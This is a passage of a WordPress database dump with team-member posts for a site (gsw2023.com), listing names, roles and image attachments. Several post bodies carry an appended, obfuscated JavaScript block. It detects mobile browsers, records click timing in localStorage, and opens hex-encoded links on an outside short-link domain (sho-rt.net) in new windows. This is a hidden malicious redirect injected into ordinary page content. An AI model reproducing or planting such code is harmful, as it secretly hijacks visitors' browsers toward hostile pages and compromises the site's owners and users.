qJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','S. K. P. Kushwaha','','publish','closed','closed','','s-k-p-kushwaha','','','2023-01-22 05:31:55','2023-01-22 05:31:55','',0,'https://gsw2023.com/?post_type=dt_team&#038;p=3639',0,'dt_team','',0),
(3640,1,'2023-01-22 05:31:00','2023-01-22 05:31:00','','m4','','inherit','open','closed','','m4-2','','','2023-01-22 05:31:00','2023-01-22 05:31:00','',3639,'https://gsw2023.com/wp-content/uploads/2023/01/m4.jpg',0,'attachment','image/jpeg',0),
(3641,1,'2023-01-22 05:33:47','2023-01-22 05:33:47','<!-- wp:paragraph -->\n<p>Social Media Coordinator</p>\n<!-- /wp:paragraph -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Miguel Luis R. Lagahit','','publish','closed','closed','','miguel-luis-r-lagahit','','','2023-01-22 05:33:50','2023-01-22 05:33:50','',0,'https://gsw2023.com/?post_type=dt_team&#038;p=3641',0,'dt_team','',0),
(3642,1,'2023-01-22 05:32:53','2023-01-22 05:32:53','','m5','','inherit','open','closed','','m5','','','2023-01-22 05:32:53','2023-01-22 05:32:53','',3641,'https://gsw2023.com/wp-content/uploads/2023/01/m5.jpg',0,'attachment','image/jpeg',0),
(3643,1,'2023-01-22 05:35:40','2023-01-22 05:35:40','<!-- wp:paragraph -->\n<p>Board Member</p>\n<!-- /wp:paragraph -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v 